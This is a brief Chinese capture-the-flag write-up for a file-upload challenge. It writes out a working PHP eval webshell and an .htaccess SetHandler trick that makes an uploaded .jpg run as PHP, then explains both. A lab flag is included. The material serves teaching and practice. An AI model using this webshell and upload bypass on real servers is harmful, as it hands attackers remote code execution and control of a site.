題目
文件上傳,那就傳個一句話木馬
最基礎的代碼,新建一個php文件,寫入
<?php @eval($_POST['attack']) ?>
抓包
修改文件后綴為jpg,更改Content-Type為image/jpeg
傳入的是jpg文件,我們需要這個解析成php文件,需要再傳一個htaccess文件
新建一個htaccess文件,寫入
SetHandler application/x-httpd-php
一樣修改一下Content-Type
鏈接蟻劍,密碼就是寫在一句話木馬POST里面的東西
flag:flag{d7fcb5bf-0e2b-48d4-a3f1-e23c488ec28b}
webshell
webshell就是以asp、php、jsp或者cgi等網頁文件形式存在的一種代碼執行環境,也可以將其稱做為一種網頁后門。
一句話木馬
簡稱Webshell,到目前web服務目錄繼而提權獲取系統權限,不論asp、php、jsp、aspx都是如此
利用文件上傳漏洞,往目標網站中上傳一句話木馬,然后你就可以在本地通過蟻劍即可獲取和控制整個網站目錄。
@表示后面即使執行錯誤,也不報錯。
eval()函數表示括號內的語句字符串什么的全都當做代碼執行。
$_POST['attack']表示從頁面中獲得attack這個參數值。
htaccess
htaccess文件是Apache服務器中的一個配置文件,它負責相關目錄下的網頁配置。通過htaccess文件,可以幫我們實現:網頁301重定向、自定義404錯誤頁面、改變文件擴展名、允許/阻止特定的用戶或者目錄的訪問、禁止目錄列表、配置默認文檔等功能。